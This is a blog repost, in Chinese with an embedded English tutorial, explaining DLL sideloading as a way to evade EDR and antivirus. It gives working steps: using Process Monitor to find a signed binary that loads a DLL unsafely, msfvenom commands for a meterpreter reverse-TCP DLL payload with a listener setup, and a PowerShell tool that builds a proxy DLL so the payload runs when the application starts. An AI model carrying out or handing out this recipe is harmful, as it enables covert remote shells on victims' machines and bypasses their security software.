DLL劫持——DLL sideloading 这玩意从EDR检测厂商看,就S1有防护能力

Sideloading DLL攻击

2021年9月4日06:38:12逆向工程评论111 views787字阅读2分37秒阅读模式

今天看到了国外的一个白皮书,地址如下:

 

https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deploy/jcp-01-00021.pdf

 

内容主要是各类技术在遇到EDR时能不能成功的绕过。

 

Sideloading DLL攻击

 

最后以一份表格总结了各类功能以及绕过效果:

 

Sideloading DLL攻击

 

我们可以看到,dll几乎绕过了所有的EDR,而这里的DLL指的便是Sideloading DLL。

 

Sideloading DLL最早应该是在一份APT报告中被提出来的,即DLL侧加载。

文档地址:

 

https://www.recordedfuture.com/apt10-cyberespionage-campaign/?__cf_chl_jschl_tk__=pmd_VKrHUzdleNocPJnRemvxCVGmjY8gkMwlsZM361GthcI-1629625791-0-gqNtZGzNAjujcnBszQil

 

Sideloading DLL攻击

 

原理如下:

 

Sideloading DLL攻击

即中间经过转发来加载恶意dll

 

利用方法:

 

首先找到一个存在dll加载(或劫持)的程序,然后使用msf生成dll

 

 
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f dll -a x86 > payload.dll

 

然后使用DLLSideloader来生成我们的转发dll,工具地址:

 

https://github.com/SkiddieTech/DLLSideloader

 

然后生成所需的文件即可

 

 
  1. Invoke-DLLSideLoad libcurl.dll payload.dll

 

然后执行exe文件,即可获取session。

 

DLLSideloader

PowerShell script to generate "proxy" counterpart of DLL files load unsafely by binaries on runtime, makes it super easy to perform a DLL Sideloading attack or hijacking

See the below articles for more details
https://flangvik.com/privesc/windows/bypass/2019/06/25/Sideload-like-your-an-APT.html
https://flangvik.com/2019/07/24/Bypassing-AV-DLL-Side-Loading.html

Both demo's are using GUP.exe signed from NotePad ++ (32bit), loading a malicious libcurl sideloading malware:

Sideloading payload.dll( meterpreter revshell) Meterpreter sideload

Loading C++ code getting revshell and bypassing AV's

 

 

AV Bypass

 

然后就是下面的文章在介绍详细使用教程:

{ Sideloading DLL like APT1337 } #


The modern desktop applications of today typically rely on loading DLL’s (Dynamic Link Library) at runtime, in many instances, this is to access some third party functions that does some specific things the developer did not implement themselves.
What if these functions suddenly came with a significant catch? Like loading, decrypting, and deploying a malicious payload into the memory of the computer? That’s called DLL-Sideloading.
Just last year, what is believed to be an APT actor with connections to the Chinese government used this technique multiple times to deploy malware onto compromised computers belonging to the Norwegian company Visma.
Recordedfuture posted a great article on this, se point 2 below.

APT10 Cyberespionage Campaign

The principal is rather simple, let me illustrate!

DLL SideLoading

 

  • A. A legitimately signed application loads a specific DLL by its name, let’s say example.dll
  • B. The original “example.dll” has been renamed and replaced with an custom “proxy” counterpart that is loaded instead.
  • C. The proxy counterpart loads our malicious DLL into memory
  • D. The proxy counterpart redirects the original calls attempted by the application to a local copy of the original DLL (step B)

 

This technique is fascinating and could come handy if you need to bypass some entry-level Anti-Virus during a pentest. Thus, I decided to write a PowerShell script that would automate the process of making a “proxy” counterpart of any DLLs, sideloading another DLL but allowing access to the original calls.

 

Identify a vulnerable target

Launch process monitor and add these filters.

 

procmon filter

 

We are looking for an application that attempts to load DLL’s from “unsafe paths” at runtime, typically in the same directory or a statically set directory that is user-land accessible. Fire up some applications of your choice and watch the list grow huge, it is preferable that the applications you launch are all signed and well-know binaries. The smaler in size the better!

procmon result


It looks like we found a prime target, GUP.exe kindly provided together with the Notepad++ installation, loads libcurl.dll on runtime. The binary size is also not huge.

Generate payload

In a later article, I will attempt to create my own undetectable DLL payload, for now, let’s use msfvenom with a classic meterpreter reverse TCP shell
Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.150 LPORT=1337 -f dll -a x86 > payload.dll


Listener:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.150
set LPORT 1337
run -j -z

 

Generate "proxy" DLL

Clone my DLL-Sideloading project from Github,load the powershell script into the session and execute the following function. The repository contains a binary copy of “DLL Export VIewer”, a great freeware and tool published by Nir Sofer Our PowerShell script uses this application to dump the function names from the DLL, feel free to download and place the binary from nirsoft directly if you don’t feel comfortable with using the one provided by me.

git clone https://github.com/SkiddieTech/DLLSideloader

cd DLLSideloader

. ./DLLSideloader.ps1

Invoke-DLLSideLoad libcurl.dll payload.dll

The powershell script will (hopefully) run like below

powershell output

The following files are generated.

file after run

 

Profit

After moving the files over to the target host, make sure they are all inn the same directory and execute application!

demo gif

Credits

Sources are listed below
http://www.nirsoft.net/utils/dll_export_viewer.html https://msitpros.com/?p=2012 https://docs.microsoft.com/en-us/powershell/ https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

 

另外还有文章:https://flangvik.com/2019/07/24/Bypassing-AV-DLL-Side-Loading.html 虽然我没有看出和上面有啥区别。。。

 

posted @ 2022-04-24 14:45  bonelee  阅读(850)  评论(0编辑  收藏  举报